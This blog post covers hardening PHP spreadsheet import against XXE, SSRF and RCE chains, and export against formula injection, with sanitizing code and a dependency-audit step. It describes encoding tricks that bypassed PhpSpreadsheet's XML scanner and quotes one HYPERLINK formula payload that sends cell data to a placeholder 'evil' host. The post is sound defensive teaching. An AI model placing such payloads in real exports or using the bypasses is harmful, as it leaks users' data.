Let's Connect

Spreadsheet rows and columns of numeric data on a dark screen, representing an uploaded XLSX file being parsed server-side

PHP spreadsheet RCE almost always begins with the most innocent-looking feature in the app: an "Import from Excel" button. I treated XLSX as a passive data format for years until I watched a parser on a client's loan-origination system make an outbound HTTP request to an attacker's server while "reading" an uploaded file. The fix is not complicated, but you have to understand why it happens first. An XLSX file is not a binary blob. It is a ZIP archive full of XML, and the moment your code feeds that XML to a parser, every XML attack class is in play: XXE, server-side request forgery, file disclosure, and on a bad day a chain that ends in remote code execution. Keep PhpSpreadsheet patched, never disable its security scanner, parse with read-data-only, and sanitize cells before export. The rest of this post is the why.

Why is reading an uploaded spreadsheet dangerous at all?

Rename any .xlsx to .zip and unzip it. You get a directory tree of XML parts: xl/workbook.xml, xl/worksheets/sheet1.xml, and a shared-strings table. PhpSpreadsheet (and the abandoned PHPExcel before it) walks that XML with PHP's libxml-backed parsers. The danger is that libxml, left at its defaults on older configurations, will resolve external entities declared in a DOCTYPE. So an attacker uploads a perfectly valid spreadsheet whose sheet1.xml contains an entity that points at file:///etc/passwd or at an internal http:// URL. When the parser expands that entity, your server reads the file or makes the request, then hands the result back inside the parsed data. That is the textbook XML External Entity (XXE) bug, and it is the root of nearly every CVE filed against these libraries.

Terminal showing source code, representing the XML parts unpacked from inside an XLSX archive
Unzip any .xlsx and you are looking at parseable XML, including a DOCTYPE an attacker can weaponize.

XXE, SSRF, and the path to RCE

It helps to separate what XXE can directly do from what it can be chained into. The direct primitives are powerful enough on their own:

  • File read: an external entity pointing at a local path returns file contents into the parsed sheet, leaking config, keys, or /etc/passwd.
  • SSRF: an entity pointing at an internal URL makes the server issue the request, which on cloud hosts can reach the metadata endpoint and hand back temporary credentials.
  • Out-of-band exfiltration: a parameter entity in an external DTD streams stolen data to an attacker-controlled host even when the response is never shown to the user.
  • Deserialization and RCE: if leaked data feeds an unsafe unserialize() path, or SSRF reaches an internal service that executes input, the XXE becomes the first link in a chain that ends in code execution.

PhpSpreadsheet ships a defense: by default every XML-based reader runs an XmlScanner over each part and throws an exception if it finds a DOCTYPE entity declaration. The uncomfortable history is that this scanner has been bypassed repeatedly. CVE-2024-45293, CVE-2024-47873, and CVE-2024-48917 all defeated the scanner the same way, by getting the charset-detection regex to disagree with what libxml actually decodes. Encode the payload as UTF-7 or UCS-4, or slip whitespace around the encoding= attribute, and the regex sees nothing while the parser cheerfully expands your entity. This is exactly why "we use the latest library" is the only durable defense; the scanner is a moving target, not a finished wall.

An XLSX upload is untrusted XML wearing a business-document costume. Parse it like you would parse anything a stranger handed you.Md Raihan Hasan

How do I harden the import?

Three layers, in order of importance. First, patch and keep patching, then never call setSecurityScannerEnabled(false) to silence an exception. Second, force the libxml entity loader off yourself rather than trusting any single library version to do it; on PHP 8 the loader defaults to off, but being explicit costs nothing and protects you if a dependency flips it. Third, read with setReadDataOnly(true) so you skip styles and macros you do not need, and run the whole import under a least-privilege OS user and a restricted network egress policy so that even a successful SSRF cannot reach your metadata endpoint.

app/Services/SpreadsheetImporter.php
<?php

namespace App\Services;

use PhpOffice\PhpSpreadsheet\IOFactory;

class SpreadsheetImporter
{
    public function read(string $path): array
    {
        // Belt-and-braces: on PHP 8 the loader is already off, but a
        // dependency can re-enable it. Make our intent explicit.
        if (\PHP_VERSION_ID < 80000 && function_exists('libxml_disable_entity_loader')) {
            libxml_disable_entity_loader(true);
        }
        // Refuse to resolve any external entity, whatever libxml's default is.
        libxml_set_external_entity_loader(static fn () => null);

        // Only trust the extension we expect; do not sniff arbitrary types.
        $reader = IOFactory::createReader('Xlsx');

        // Skip formatting/macros we don't need, and KEEP the scanner on.
        $reader->setReadDataOnly(true);
        $reader->setReadEmptyCells(false);
        // Never do this: $reader->setSecurityScannerEnabled(false);

        $spreadsheet = $reader->load($path); // throws on a DOCTYPE entity

        return $spreadsheet->getActiveSheet()->toArray(
            nullValue: null,
            calculateFormulas: false, // do not evaluate untrusted formulas
            formatData: false
        );
    }
}

Two details in that snippet matter more than they look. calculateFormulas: false means you never evaluate a formula an attacker wrote, and naming the reader explicitly with createReader('Xlsx') rather than letting IOFactory auto-detect stops a renamed file from being routed to an unexpected reader. The same upload discipline applies to every file feature you have, which I cover in securing file uploads in PHP.

What about formula injection on the way out?

The mirror image of the import problem is CSV or formula injection on export, and it bites you even when your own data is clean. If a user stored a value like =HYPERLINK("http://evil/"&A2,"click") or a cell beginning with +, -, or @, and you write that straight into a CSV or XLSX, the victim's spreadsheet app may execute it on open. That is not your server running code, it is your file weaponizing someone else's machine. The defense is to neutralize any cell whose first character is =, +, -, @, tab, or carriage return by prefixing a single quote so the app treats it as literal text.

app/Support/CellSanitizer.php
<?php

namespace App\Support;

class CellSanitizer
{
    private const DANGEROUS = ['=', '+', '-', '@', "\t", "\r"];

    public static function escape(mixed $value): mixed
    {
        if (!is_string($value) || $value === '') {
            return $value;
        }

        if (in_array($value[0], self::DANGEROUS, true)) {
            // Leading apostrophe forces text mode in Excel/Sheets/LibreOffice.
            return "'" . $value;
        }

        return $value;
    }
}

Run every outbound cell through that before it reaches your writer, and apply it at the boundary so no export path can forget it. This belongs in your standard hardening pass alongside the rest of the Laravel security checklist.

Keeping the dependency honest

Because the protection lives in a library that keeps getting bypassed, your real control is dependency hygiene. Wire composer audit into CI so a newly disclosed PhpSpreadsheet CVE fails the build instead of sitting unnoticed for months.

terminal
# Fails the pipeline on any known advisory in the lock file
composer audit --locked --format=plain

# Pull the patched line; check the changelog for the relevant GHSA fix
composer require phpoffice/phpspreadsheet --update-with-dependencies

If you have never read one of those advisory dumps closely, I walk through the format and how to triage it in how to read and fix a composer audit report. The project's own reading-files documentation covers the XmlScanner behaviour and is worth bookmarking before you touch a reader.

None of this requires exotic tooling. The trap is purely conceptual: we file spreadsheet import under "data plumbing" instead of "untrusted input parsing," and the security scanner lets us believe the library has it handled. It mostly does, until the next regex bypass lands. Treat every uploaded XLSX as hostile XML, parse it read-data-only with the entity loader off and the scanner on, sanitize cells on export, and let composer audit tell you the day your safety net develops a hole. Do that, and the import button stops being the softest target in your app.